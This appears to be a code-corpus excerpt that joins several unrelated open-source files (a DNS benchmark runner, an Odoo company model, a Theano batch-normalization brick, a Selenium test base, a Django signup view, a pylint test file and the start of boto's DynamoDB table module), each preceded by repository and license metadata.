if hasattr(self, 'status_callback') and self.status_callback:
self.status_callback(msg, **kwargs)
else:
print msg
def DebugMsg(self, message):
self.UpdateStatus(message, debug=True)
def LoadDataSources(self):
self.data_src = data_sources.DataSources(status_callback=self.UpdateStatus)
def PrepareTestRecords(self):
"""Figure out what data source a user wants, and create test_records."""
if self.options.input_source:
src_type = self.options.input_source
else:
src_type = self.data_src.GetBestSourceDetails()[0]
self.options.input_source = src_type
self.test_records = self.data_src.GetTestsFromSource(
src_type,
self.options.query_count,
select_mode=self.options.select_mode
)
def GatherNameServerData(self):
"""Build a nameserver data set from config and other sources."""
ns_data = config.GetNameServerData()
for i, ip in enumerate(self.options.servers):
ns = nameserver.NameServer(ip, tags=['specified'], name='USR%s-%s' % (i, ip))
ns_data.append(ns)
return ns_data
def GetExternalNetworkData(self):
"""Return a domain and ASN for myself."""
asn = None
domain = None
client_ip = providers.GetExternalIp()
if client_ip:
# self.UpdateStatus("Detected external IP as %s" % client_ip)
local_ns = providers.SystemResolver()
hostname = local_ns.GetReverseIp(client_ip)
if hostname != client_ip:
domain = addr_util.GetDomainFromHostname(hostname)
else:
domain = None
asn = local_ns.GetAsnForIp(client_ip)
return (domain, asn)
def PrepareNameServers(self):
"""Setup self.nameservers to have a list of healthy fast servers."""
self.nameservers = self.GatherNameServerData()
self.nameservers.max_servers_to_check = self.options.max_servers_to_check
self.nameservers.thread_count = self.options.health_thread_count
require_tags = set()
include_tags = self.options.tags
country_code = None
if self.options.ipv6_only:
require_tags.add('ipv6')
elif self.options.ipv4_only:
require_tags.add('ipv4')
if self.options.tags.intersection(set(['nearby', 'country', 'likely-isp', 'nearby'])):
country_code, country_name, lat, lon = self.ConfiguredLocationData()
if country_code:
self.nameservers.SetClientLocation(lat, lon, country_code)
if self.options.tags.intersection(set(['isp','network'])):
domain, asn = self.GetExternalNetworkData()
if asn:
self.nameservers.SetNetworkLocation(domain, asn)
self.UpdateStatus("Looking for nameservers within %s or AS%s" % (domain, asn))
self.nameservers.AddNetworkTags()
if 'country' in self.options.tags:
include_tags.discard('country')
include_tags.add('country_%s' % country_code.lower())
if 'nearby' in self.options.tags and lat:
distance = self.options.distance
if 'country' in self.options.tags:
if self.nameservers.HasEnoughInCountryServers() and self.options.distance > self.options.overload_distance:
self.UpdateStatus("Looks like we already have >%s in-country servers, shortening nearby distance." % self.options.max_servers_to_check)
distance = self.options.overload_distance
self.UpdateStatus("Adding locality flags for servers within %skm of %s,%s" % (distance, lat, lon))
self.nameservers.AddLocalityTags(max_distance=distance)
self.nameservers.status_callback = self.UpdateStatus
self.UpdateStatus("DNS server filter: %s %s" % (','.join(include_tags),
','.join(require_tags)))
self.nameservers.FilterByTag(include_tags=include_tags,
require_tags=require_tags)
def ConfiguredLocationData(self):
self.DiscoverLocation()
if self.options.country:
country_code, country_name, lat, lon = geoip.GetInfoForCountry(self.options.country)
self.UpdateStatus("Set country to %s - %s (%s,%s)" % (country_code, country_name, lat, lon))
else:
country_code = self.geodata.get('country_code')
if not country_code:
return None, None, None, None
country_code, country_name = geoip.GetInfoForCountry(country_code)[0:2]
region = self.geodata.get('region_name')
lat = self.geodata.get('latitude')
lon = self.geodata.get('longitude')
self.UpdateStatus("Determined location as %s: %s, %s (%s,%s)" % (country_code, region, country_name, lat, lon))
return country_code, country_name, lat, lon
def CheckNameServerHealth(self):
self.nameservers.SetTimeouts(self.options.timeout,
self.options.ping_timeout,
self.options.health_timeout)
self.nameservers.CheckHealth(sanity_checks=config.GetSanityChecks())
def PrepareBenchmark(self):
"""Setup the benchmark object with the appropriate dataset."""
if len(self.nameservers) == 1:
thread_count = 1
else:
thread_count = self.options.benchmark_thread_count
self.bmark = benchmark.Benchmark(self.nameservers,
query_count=self.options.query_count,
run_count=self.options.run_count,
thread_count=thread_count,
status_callback=self.UpdateStatus)
def RunBenchmark(self):
"""Run the benchmark."""
results = self.bmark.Run(self.test_records)
self.UpdateStatus("Benchmark finished.")
index = []
if self.options.upload_results in (1, True):
connector = site_connector.SiteConnector(self.options, status_callback=self.UpdateStatus)
index_hosts = connector.GetIndexHosts()
if index_hosts:
index = self.bmark.RunIndex(index_hosts)
else:
index = []
self.DiscoverLocation()
self.reporter = reporter.ReportGenerator(self.options, self.nameservers,
results, index=index, geodata=self.geodata)
def DiscoverLocation(self):
if not getattr(self, 'geodata', None):
self.UpdateStatus("Determining your location...")
self.geodata = geoip.GetGeoData()
# Try again
if not self.geodata:
self.UpdateStatus("Determining your location (retry)...")
self.geodata = geoip.GetGeoData()
return self.geodata
def RunAndOpenReports(self):
"""Run the benchmark and open up the report on completion."""
self.RunBenchmark()
best = self.reporter.BestOverallNameServer()
self.CreateReports()
if self.options.template == 'html':
self.DisplayHtmlReport()
if self.url:
self.UpdateStatus('Complete! Your results: %s' % self.url)
else:
self.UpdateStatus('Complete! %s [%s] is the best.' % (best.name, best.ip))
def CreateReports(self):
"""Create CSV & HTML reports for the latest run."""
if self.options.output_file:
self.report_path = self.options.output_file
else:
self.report_path = util.GenerateOutputFilename(self.options.template)
if self.options.csv_file:
self.csv_path = self.options_csv_file
else:
self.csv_path = util.GenerateOutputFilename('csv')
if self.options.upload_results in (1, True):
# This is for debugging and transparency only.
self.json_path = util.GenerateOutputFilename('js')
self.UpdateStatus('Saving anonymized JSON to %s' % self.json_path)
json_data = self.reporter.CreateJsonData()
f = open(self.json_path, 'w')
f.write(json_data)
f.close()
self.UpdateStatus('Uploading results to %s' % self.options.site_url)
connector = site_connector.SiteConnector(self.options, status_callback=self.UpdateStatus)
self.url, self.share_state = connector.UploadJsonResults(
json_data,
hide_results=self.options.hide_results
)
if self.url:
self.UpdateStatus('Your sharing URL: %s (%s)' % (self.url, self.share_state))
self.UpdateStatus('Saving report to %s' % self.report_path)
f = open(self.report_path, 'w')
self.reporter.CreateReport(format=self.options.template,
output_fp=f,
csv_path=self.csv_path,
sharing_url=self.url,
sharing_state=self.share_state)
f.close()
self.UpdateStatus('Saving detailed results to %s' % self.csv_path)
self.reporter.SaveResultsToCsv(self.csv_path)
def DisplayHtmlReport(self):
self.UpdateStatus('Opening %s' % self.report_path)
better_webbrowser.output = self.DebugMsg
better_webbrowser.open(self.report_path)
| apache-2.0 |
codekaki/odoo | addons/account/company.py | 56 | 2828 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class res_company(osv.osv):
    """Extends res.company with accounting configuration fields."""
    _inherit = "res.company"
    _columns = {
        'expects_chart_of_accounts': fields.boolean('Expects a Chart of Accounts'),
        'tax_calculation_rounding_method': fields.selection([
            ('round_per_line', 'Round per Line'),
            ('round_globally', 'Round Globally'),
            ], 'Tax Calculation Rounding Method',
            help="If you select 'Round per Line' : for each tax, the tax amount will first be computed and rounded for each PO/SO/invoice line and then these rounded amounts will be summed, leading to the total amount for that tax. If you select 'Round Globally': for each tax, the tax amount will be computed for each PO/SO/invoice line, then these amounts will be summed and eventually this total tax amount will be rounded. If you sell with tax included, you should choose 'Round per line' because you certainly want the sum of your tax-included line subtotals to be equal to the total amount with taxes."),
        'paypal_account': fields.char("Paypal Account", size=128, help="Paypal username (usually email) for receiving online payments."),
        'overdue_msg': fields.text('Overdue Payments Message', translate=True),
    }
    # Defaults applied when a new company record is created.
    _defaults = {
        'expects_chart_of_accounts': True,
        'tax_calculation_rounding_method': 'round_per_line',
        'overdue_msg': '''Dear Sir/Madam,
Our records indicate that some payments on your account are still due. Please find details below.
If the amount has already been paid, please disregard this notice. Otherwise, please forward us the total amount stated below.
If you have any queries regarding your account, Please contact us.
Thank you in advance for your cooperation.
Best Regards,'''
    }
# Legacy OpenERP idiom: instantiating the model class at import time
# (presumably registers it with the ORM pool -- confirm; harmless either way).
res_company()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
lukemetz/cuboid | cuboid/bricks/batch_norm.py | 1 | 10524 | from blocks.main_loop import MainLoop
from blocks.algorithms import TrainingAlgorithm
from blocks.roles import add_role, AuxiliaryRole
import numpy as np
from blocks.bricks.base import Brick, lazy, application
from blocks.config import config
from blocks.utils import shared_floatx_nans
from blocks.roles import WEIGHT, BIAS
from blocks.initialization import Constant
from theano import tensor as T
from blocks.filter import VariableFilter, get_brick
from blocks.utils import dict_union
from blocks.graph import add_annotation, Annotation
from blocks.filter import get_application_call
import theano
import logging
from collections import OrderedDict
from cuboid.graph import get_parameter_name
from blocks.extensions import FinishAfter, ProgressBar
# Module-level logger, named after this module.
logger = logging.getLogger(__name__)
class BatchNormPopulationRole(AuxiliaryRole):
    """Auxiliary-variable role tagging batch-norm population statistics."""
    pass
#: Variable for batchnorm populations
BATCHNORM_POPULATION = BatchNormPopulationRole()
class BatchNormalization(Brick):
    """Batch-normalization brick.

    Normalizes its input with minibatch mean/variance (or, when
    ``use_population`` is True, with accumulated population statistics
    ``u``/``s`` divided by the sample counter ``n``), then applies the
    learned scale ``g`` and shift ``b``.
    """
    # Module-wide RNG from which each instance lazily draws its own seed.
    seed_rng = np.random.RandomState(config.default_seed)

    @lazy(allocation=['input_dim'])
    def __init__(self, input_dim, epsilon=1e-8, use_population=False,
                 rolling_accumulate=False, accumulate=False, alpha=0.99, **kwargs):
        """Initialize the brick.

        :param input_dim: int for flat input, or a shape tuple (channels
            first for CNN input) -- see :attr:`naxes`.
        :param epsilon: numerical-stability constant added to the variance.
        :param use_population: normalize with accumulated statistics
            instead of the current minibatch statistics.
        :param rolling_accumulate: attach exponential-moving-average
            updates for u/s to each application call.
        :param accumulate: attach plain-sum updates (for
            :class:`BatchNormAccumulate`).
        :param alpha: decay factor for the rolling accumulation.
        """
        super(BatchNormalization, self).__init__(**kwargs)
        self.input_dim = input_dim
        self.use_population = use_population
        self.e = epsilon
        self.accumulate = accumulate
        self.rolling_accumulate = rolling_accumulate
        self.alpha = alpha

    @property
    def seed(self):
        # Lazily drawn from the class-level RNG and cached on the instance.
        if getattr(self, '_seed', None) is not None:
            return self._seed
        else:
            self._seed = self.seed_rng.randint(np.iinfo(np.int32).max)
            return self._seed

    @seed.setter
    def seed(self, value):
        # A seed may only be assigned before it has been read or set.
        if hasattr(self, '_seed'):
            raise AttributeError("seed already set")
        self._seed = value

    @property
    def rng(self):
        if getattr(self, '_rng', None) is not None:
            return self._rng
        else:
            # NOTE: not cached -- a fresh RandomState per access unless
            # explicitly set via the setter.
            return np.random.RandomState(self.seed)

    @rng.setter
    def rng(self, rng):
        self._rng = rng

    @property
    def naxes(self):
        # Number of axes of the expected input: 2 for flat (batch, dim)
        # input, otherwise one batch axis plus len(input_dim) feature axes.
        if isinstance(self.input_dim, int):
            return 2
        else:
            return len(self.input_dim) + 1

    def _allocate(self):
        # Pick the per-feature dimension the statistics are kept over:
        # 4 axes -> CNN (channels first), 3 axes -> RNN (features last).
        naxes = self.naxes
        if naxes == 2:
            dim = self.input_dim
        elif naxes == 4:
            dim = self.input_dim[0]
        elif naxes == 3:
            dim = self.input_dim[-1]
        else:
            raise NotImplementedError
        # Learned scale and shift.
        self.g = shared_floatx_nans((dim, ), name='g')
        self.b = shared_floatx_nans((dim, ), name='b')
        add_role(self.g, WEIGHT)
        add_role(self.b, BIAS)
        self.parameters = [self.g, self.b]
        # parameters for inference
        # u/s hold accumulated mean/variance sums; n counts accumulation
        # steps so that u/n and s/n are the population estimates.
        self.u = shared_floatx_nans((dim, ), name='u')
        self.s = shared_floatx_nans((dim, ), name='s')
        self.n = shared_floatx_nans((1,), name='n')
        self.add_auxiliary_variable(self.u, roles=[BATCHNORM_POPULATION])
        self.add_auxiliary_variable(self.s, roles=[BATCHNORM_POPULATION])
        self.add_auxiliary_variable(self.n, roles=[BATCHNORM_POPULATION])

    def _initialize(self):
        # Identity transform (g=1, b=0) and zeroed population statistics.
        Constant(1).initialize(self.g, self.rng)
        Constant(0).initialize(self.b, self.rng)
        Constant(0).initialize(self.u, self.rng)
        Constant(0).initialize(self.s, self.rng)
        Constant(0).initialize(self.n, self.rng)

    @application(inputs=['input_'], outputs=['output'])
    def apply(self, input_, **kwargs):
        output, u, s = self.do_apply(input_, **kwargs)
        if self.accumulate:
            if self.use_population:
                raise Exception("use_population is set to true as well as with"
                                "accumulation.",
                                "This is not possible as there is nothing to "
                                "take the population of.")
            # Plain running sums; consumers divide by n for the estimate.
            # NOTE(review): assumes self.updates is a dict made available
            # elsewhere (consumed by BatchNormAccumulate) -- confirm.
            self.updates[self.u] = self.u + u
            self.updates[self.s] = self.s + s
            self.updates[self.n] = self.n + 1
        if self.rolling_accumulate:
            if self.use_population:
                raise Exception("use_population is set to true as well as with"
                                "rolling_accumulation."
                                "This is not currently supported, "
                                " and might not make sense.")
            # Exponential moving average attached to this application call;
            # n is pinned to 1 so u/n and s/n stay the EMA values.
            annotation = get_application_call(output)
            annotation.updates[self.u] = self.u * self.alpha + (1-self.alpha) * u
            annotation.updates[self.s] = self.s * self.alpha + (1-self.alpha) * s
            annotation.updates[self.n] = self.n*0 + 1
        return output

    @application(inputs=['input_'], outputs=['output', 'u', 's'])
    def do_apply(self, input_):
        """Normalize ``input_``; also return the mean/variance used."""
        X = input_
        naxes = self.naxes
        broadcast_n = T.addbroadcast(self.n, 0)
        if naxes == 4:  # CNN
            # Statistics per channel, over batch and spatial axes.
            if self.use_population:
                u = self.u/broadcast_n
            else:
                u = T.mean(X, axis=[0, 2, 3])
            b_u = u.dimshuffle('x', 0, 'x', 'x')
            if self.use_population:
                s = self.s/broadcast_n
            else:
                s = T.mean(T.sqr(X - b_u), axis=[0, 2, 3])
            X = (X - b_u) / T.sqrt(s.dimshuffle('x', 0, 'x', 'x') + self.e)
            X = self.g.dimshuffle('x', 0, 'x', 'x')*X +\
                self.b.dimshuffle('x', 0, 'x', 'x')
        elif naxes == 3:  # RNN
            # Statistics per feature, over batch and time axes.
            if self.use_population:
                u = self.u/broadcast_n
            else:
                u = T.mean(X, axis=[0, 1])
            b_u = u.dimshuffle('x', 'x', 0)
            if self.use_population:
                s = self.s/broadcast_n
            else:
                s = T.mean(T.sqr(X - b_u), axis=[0, 1])
            X = (X - b_u) / T.sqrt(s.dimshuffle('x', 'x', 0) + self.e)
            X = self.g.dimshuffle('x', 'x', 0)*X +\
                self.b.dimshuffle('x', 'x', 0)
        elif naxes == 2:  # FC
            # Statistics per feature, over the batch axis.
            if self.use_population:
                u = self.u/broadcast_n
            else:
                u = T.mean(X, axis=0)
            if self.use_population:
                s = self.s/broadcast_n
            else:
                s = T.mean(T.sqr(X - u), axis=0)
            X = (X - u) / T.sqrt(s + self.e)
            X = self.g*X + self.b
        else:
            raise NotImplementedError
        return X, u, s

    def get_dim(self, name):
        # Input and output share the configured dimensionality.
        if name == "input_" or name == "output":
            return self.input_dim
        else:
            return super(BatchNormalization, self).get_dim(name)
class BatchNormAccumulate(TrainingAlgorithm):
    """ TrainingAlgorithm that accumulates batchnorm parameters

    Runs the graph's batch-norm accumulation updates (sums of means,
    variances and a sample counter) over the batches it is fed, instead
    of performing any gradient step.
    """
    def __init__(self, cg):
        # cg: computation graph / model whose BATCHNORM_POPULATION
        # variables should be accumulated.
        self.cg = cg
        self.parameters = get_batchnorm_parameters(cg)
        self.inputs = cg.inputs
        self._input_names = [i.name for i in self.inputs]

    def initialize(self, **kwargs):
        """Validate the brick updates and compile the accumulation function."""
        logger.info("BatchNormAccumulate initializing")
        # get list of bricks
        bricks_seen = set()
        for p in self.parameters:
            brick = get_brick(p)
            if brick not in bricks_seen:
                bricks_seen.add(brick)
        # ensure all updates account for all bricks
        update_parameters = set()
        for b in bricks_seen:
            for var, update in b.updates.items():
                update_parameters.add(var)
            # Accumulation must start from a zeroed sample counter.
            assert b.n.get_value() == 0
        if set(update_parameters) != set(self.parameters):
            raise ValueError("The updates and the parameters passed in do "
                             "not match. This could be due to no applications "
                             "or multiple applications found %d updates, and "
                             "%d parameters" % (len(update_parameters),
                                                len(self.parameters)))
        updates = dict_union(*[b.updates for b in bricks_seen])
        logger.info("Compiling BatchNorm accumulate")
        # No outputs: the function exists only for its shared-variable updates.
        self._func = theano.function(self.inputs, [], updates=updates,
                                     on_unused_input="warn")
        super(BatchNormAccumulate, self).initialize(**kwargs)

    def process_batch(self, batch):
        """Feed one batch (dict of named sources) through the updates."""
        if not set(self._input_names).issubset((batch.keys())):
            raise ValueError("Invalid batch. Got sources: (%s), expected "
                             "sources: (%s)" % (str(batch.keys()),
                                                str(self._input_names)))
        # Order the batch values to match the compiled function's inputs.
        ordered_batch = [batch[v.name] for v in self.inputs]
        self._func(*ordered_batch)
def get_batchnorm_parameters(cg):
    """Collect the variables tagged with the BATCHNORM_POPULATION role.

    Parameters
    ----------
    cg : blocks.graph.ComputationGraph
        Computation graph whose auxiliary variables are searched.

    Returns
    -------
    list
        The batch-norm population-statistics variables.
    """
    population_filter = VariableFilter(roles=[BATCHNORM_POPULATION])
    return population_filter(cg.auxiliary_variables)
def infer_population(data_stream, model, n_batches):
    """Sets the population parameters for a given model"""
    # Drive the accumulation updates for n_batches batches of the stream.
    loop = MainLoop(
        algorithm=BatchNormAccumulate(model),
        data_stream=data_stream,
        model=model,
        extensions=[FinishAfter(after_n_batches=n_batches), ProgressBar()])
    loop.run()
    # Switch every batch-norm brick over to its accumulated statistics.
    bricks = {get_brick(p) for p in get_batchnorm_parameters(model)}
    for brick in bricks:
        brick.use_population = True
def get_batchnorm_parameter_dict(model):
    """Map each population parameter's canonical name to its variable."""
    return OrderedDict(
        (get_parameter_name(param), param)
        for param in get_batchnorm_parameters(model))
def get_batchnorm_parameter_values(model):
    """Return a name -> numpy value mapping of the population parameters."""
    values = {}
    for name, variable in get_batchnorm_parameter_dict(model).items():
        values[name] = variable.get_value()
    return values
def set_batchnorm_parameter_values(model, values_dict):
    """Load population-parameter values (keyed by name) into the model.

    Name mismatches are logged as errors; as before, a value that is
    missing for an existing parameter still raises KeyError when that
    parameter is reached in the assignment loop.
    """
    bn_dict = get_batchnorm_parameter_dict(model)
    extra = set(values_dict) - set(bn_dict)
    if extra:
        logger.error("unknown parameter names: {}\n".format(extra))
    absent = set(bn_dict) - set(values_dict)
    if absent:
        logger.error("missing values for parameters: {}\n".format(absent))
    for name, variable in bn_dict.items():
        variable.set_value(values_dict[name])
| mit |
datacommonsorg/website | server/webdriver_tests/base_test.py | 1 | 3177 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask_testing import LiveServerTestCase
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from main import app
from os import environ
# Read flag from OS' environment.
# TODO(edumorales): Figure out a way to pass down an argument using Pytest.
PYTEST_PARALLEL = environ.get("PYTEST_PARALLEL")
# Default browser window size, in pixels, applied in setUp().
DEFAULT_HEIGHT = 1200
DEFAULT_WIDTH = 1200
# Base test class to setup the server.
# Please refer to README.md to see the order of method execution during test.
class WebdriverBaseTest(LiveServerTestCase):

    def create_app(self):
        """Returns the Flask Server running Data Commons."""
        flask_app = app
        # Every test starts its own Flask server. Port 0 lets Flask pick
        # any free port; a fixed port (default 5000) would race when
        # several test servers run concurrently.
        flask_app.config['LIVESERVER_PORT'] = 0
        return flask_app

    def setUp(self):
        """Runs at the beginning of every individual test."""
        # ChromeDriver must run headless and sandbox-free inside a Docker
        # container without a UI.
        chrome_options = Options()
        for flag in ('--headless', '--no-sandbox', '--disable-dev-shm-usage'):
            chrome_options.add_argument(flag)
        # Maximum time, in seconds, before throwing a TimeoutException.
        self.TIMEOUT_SEC = 60
        if not PYTEST_PARALLEL:
            # Default: a plain local ChromeDriver instance.
            self.driver = webdriver.Chrome(options=chrome_options)
        else:
            # Parallel mode: ask Selenium Grid (listening on port 4444)
            # for a new ChromeDriver; the Grid tracks all instances.
            self.driver = webdriver.Remote(
                command_executor="http://0.0.0.0:4444/wd/hub",
                desired_capabilities=webdriver.DesiredCapabilities.CHROME,
                options=chrome_options)
        # Reliable default window size for all tests (may be overwritten).
        self.driver.set_window_size(DEFAULT_WIDTH, DEFAULT_HEIGHT)
        # The URL of the Data Commons server.
        self.url_ = self.get_server_url()

    def tearDown(self):
        """Runs at the end of every individual test."""
        # Each test owns its own ChromeDriver instance; shut it down.
        self.driver.quit()
| apache-2.0 |
gdetrez/MyConf | apps/signup/views.py | 1 | 1334 | from django.forms import ModelForm
from signup.models import SessionSignup
from schedule.models import Session
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.template import loader, RequestContext
from django.forms.widgets import HiddenInput
# Create your views here.
class SignupForm(ModelForm):
    """ModelForm for SessionSignup; the session is carried in a hidden field."""
    class Meta:
        model = SessionSignup
        widgets = {
            # The session is pre-selected by the view, not chosen by the user.
            'session': HiddenInput()
        }
    class Media:
        css = {
            'all': ('style/forms.css',)
        }
def signup(request, session_pk):
    """Display and process the signup form for one schedule Session."""
    session = get_object_or_404(Session, pk=session_pk)
    if request.method == 'POST':
        # Bound form: validate and persist the signup.
        form = SignupForm(request.POST)
        if form.is_valid():
            form.save()
            # Redirect after POST with a success marker in the query string.
            return HttpResponseRedirect(session.get_absolute_url() + "?signedup=ok")
    else:
        # Unbound form, pre-populated with the target session.
        form = SignupForm(instance=SessionSignup(session=session))
    template = loader.get_template('schedule/session_signup.djhtml')
    context = RequestContext(request, {
        'form': form,
        'session': session
    })
    return HttpResponse(template.render(context))
| agpl-3.0 |
lucidmotifs/auto-aoc | .venv/lib/python3.5/site-packages/pylint/test/functional/invalid_sequence_index.py | 5 | 7143 | """Errors for invalid sequence indices"""
# pylint: disable=too-few-public-methods, no-self-use, import-error, missing-docstring
import six
from unknown import Unknown
# Shared fixtures indexed by the test functions below.
TESTLIST = [1, 2, 3]
TESTTUPLE = (1, 2, 3)
TESTSTR = '123'
# getitem tests with bad indices
def function1():
    """List index is the builtin function ``id``, not an integer."""
    return TESTLIST[id] # [invalid-sequence-index]
def function2():
    """List index is the constant None."""
    return TESTLIST[None] # [invalid-sequence-index]
def function3():
    """List index is a float-valued expression."""
    return TESTLIST[float(0)] # [invalid-sequence-index]
def function4():
    """List index is a str constant."""
    return TESTLIST['0'] # [invalid-sequence-index]
def function5():
    """List index is an instance of a class lacking __index__."""
    class NonIndexType(object):
        """Class without __index__ method"""
        pass
    return TESTLIST[NonIndexType()] # [invalid-sequence-index]
def function6():
    """Tuple index is None"""
    return TESTTUPLE[None] # [invalid-sequence-index]
def function7():
    """String index is None"""
    return TESTSTR[None] # [invalid-sequence-index]
def function8():
    """Index of a tuple subclass (inheriting tuple's __getitem__) is None."""
    class TupleTest(tuple):
        """Subclass of tuple"""
        pass
    return TupleTest()[None] # [invalid-sequence-index]
# getitem tests with good indices
def function9():
    """List index is an int constant (valid)."""
    return TESTLIST[0] # no error
def function10():
    """List index is an integer-valued expression (valid)."""
    return TESTLIST[int(0.0)] # no error
def function11():
    """List index is a slice object (valid)."""
    return TESTLIST[slice(1, 2, 3)] # no error
def function12():
    """List index implements __index__ (valid)."""
    class IndexType(object):
        """Class with __index__ method"""
        def __index__(self):
            """Allow objects of this class to be used as slice indices"""
            return 0
    return TESTLIST[IndexType()] # no error
def function13():
    """List index inherits __index__ from a superclass (valid)."""
    class IndexType(object):
        """Class with __index__ method"""
        def __index__(self):
            """Allow objects of this class to be used as slice indices"""
            return 0
    class IndexSubType(IndexType):
        """Class with __index__ in parent"""
        pass
    return TESTLIST[IndexSubType()] # no error
def function14():
    """Tuple index is an int constant (valid)."""
    return TESTTUPLE[0]
def function15():
    """String index is an int constant (valid)."""
    return TESTSTR[0]
def function16():
    """Index of a plain tuple subclass is an int constant (valid)."""
    class TupleTest(tuple):
        """Subclass of tuple"""
        pass
    return TupleTest()[0] # no error
def function17():
    """Tuple subclass overrides __getitem__, so a None index is accepted."""
    class TupleTest(tuple):
        """Subclass of tuple with custom __getitem__"""
        def __getitem__(self, index):
            """Allow non-integer indices"""
            return 0
    return TupleTest()[None] # no error
def function18():
    """A __getitem__ override inherited via a superclass also accepts None."""
    class TupleTest(tuple):
        """Subclass of tuple with custom __getitem__"""
        def __getitem__(self, index):
            """Allow non-integer indices"""
            return 0
    class SubTupleTest(TupleTest):
        """Subclass of a subclass of tuple"""
        pass
    return SubTupleTest()[None] # no error
# Test with set and delete statements
def function19():
    """Assignment with a None index (bad) and an integer index (good)."""
    TESTLIST[None] = 0 # [invalid-sequence-index]
    TESTLIST[0] = 0 # no error
def function20():
    """Deletion with a None index (bad) and an integer index (good)."""
    del TESTLIST[None] # [invalid-sequence-index]
    del TESTLIST[0] # no error
def function21():
    """Set and delete on a list subclass inheriting all index handlers."""
    class ListTest(list):
        """Inherit all list get/set/del handlers"""
        pass
    test = ListTest()
    # Set and delete with invalid indices
    test[None] = 0 # [invalid-sequence-index]
    del test[None] # [invalid-sequence-index]
    # Set and delete with valid indices
    test[0] = 0 # no error
    del test[0] # no error
def function22():
    """list subclass overriding only __setitem__: get/del still need ints."""
    class ListTest(list):
        """Override setitem but not get or del"""
        def __setitem__(self, key, value):
            pass
    test = ListTest()
    # failure on the getitem with None
    test[None][0] = 0 # [invalid-sequence-index]
    # failure on the delitem with None
    del test[None] # [invalid-sequence-index]
    test[0][0] = 0 # getitem with int and setitem with int, no error
    test[None] = 0 # setitem overridden, no error
    test[0] = 0 # setitem with int, no error
    del test[0] # delitem with int, no error
def function23():
    """list subclass overriding only __delitem__: get/set still need ints."""
    class ListTest(list):
        """Override delitem but not get or set"""
        def __delitem__(self, key):
            pass
    test = ListTest()
    # failure on the getitem with None
    test[None][0] = 0 # [invalid-sequence-index]
    # setitem with invalid index
    test[None] = 0 # [invalid-sequence-index]
    test[0][0] = 0 # getitem with int and setitem with int, no error
    test[0] = 0 # setitem with int, no error
    del test[None] # delitem overridden, no error
    del test[0] # delitem with int, no error
def function24():
    """list subclass overriding only __getitem__: set/del still need ints."""
    class ListTest(list):
        """Override getitem but not del or set"""
        def __getitem__(self, key):
            pass
    test = ListTest()
    # setitem with invalid index
    test[None] = 0 # [invalid-sequence-index]
    # delitem with invalid index
    del test[None] # [invalid-sequence-index]
    test[None][0] = 0 # getitem overridden, no error
    test[0][0] = 0 # getitem with int and setitem with int, no error
    test[0] = 0 # setitem with int, no error
    del test[0] # delitem with int, no error
# Test extended-slice (ExtSlice) usage
def function25():
    """Extended slice (ellipsis) used with a plain list (bad)."""
    return TESTLIST[..., 0] # [invalid-sequence-index]
def function26():
    """Extended slice used with an object that implements __getitem__ (valid)."""
    class ExtSliceTest(object):
        """Permit extslice syntax by implementing __getitem__"""
        def __getitem__(self, index):
            return 0
    return ExtSliceTest()[..., 0] # no error
def function27():
    """Don't warn in the case where the indexed object has unknown base classes."""
    class UnknownBase(Unknown):
        pass
    slices = UnknownBase["aaaa"] + UnknownBase()[object]
    ext_slices = UnknownBase[..., 0] + UnknownBase()[..., 0]
    return slices, ext_slices
def function28():
    """Don't emit for classes whose metaclass implements __getitem__."""
    class Meta(type):
        def __getitem__(cls, arg):
            return 24
    @six.add_metaclass(Meta)
    class Works(object):
        pass
    @six.add_metaclass(Meta)
    class Error(list):
        pass
    return Works['hello'] + Error['hello']
| mit |
yg257/Pangea | lib/boto-2.34.0/boto/dynamodb/table.py | 153 | 21808 | # Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.dynamodb.batch import BatchList
from boto.dynamodb.schema import Schema
from boto.dynamodb.item import Item
from boto.dynamodb import exceptions as dynamodb_exceptions
import time
class TableBatchGenerator(object):
    """
    A low-level generator used to page through results from
    batch_get_item operations.

    :ivar consumed_units: An integer that holds the number of
        ConsumedCapacityUnits accumulated thus far for this
        generator.
    """

    def __init__(self, table, keys, attributes_to_get=None,
                 consistent_read=False):
        # table: the Table whose items are fetched.
        # keys: list of (hash_key, range_key) / hash_key entries; consumed
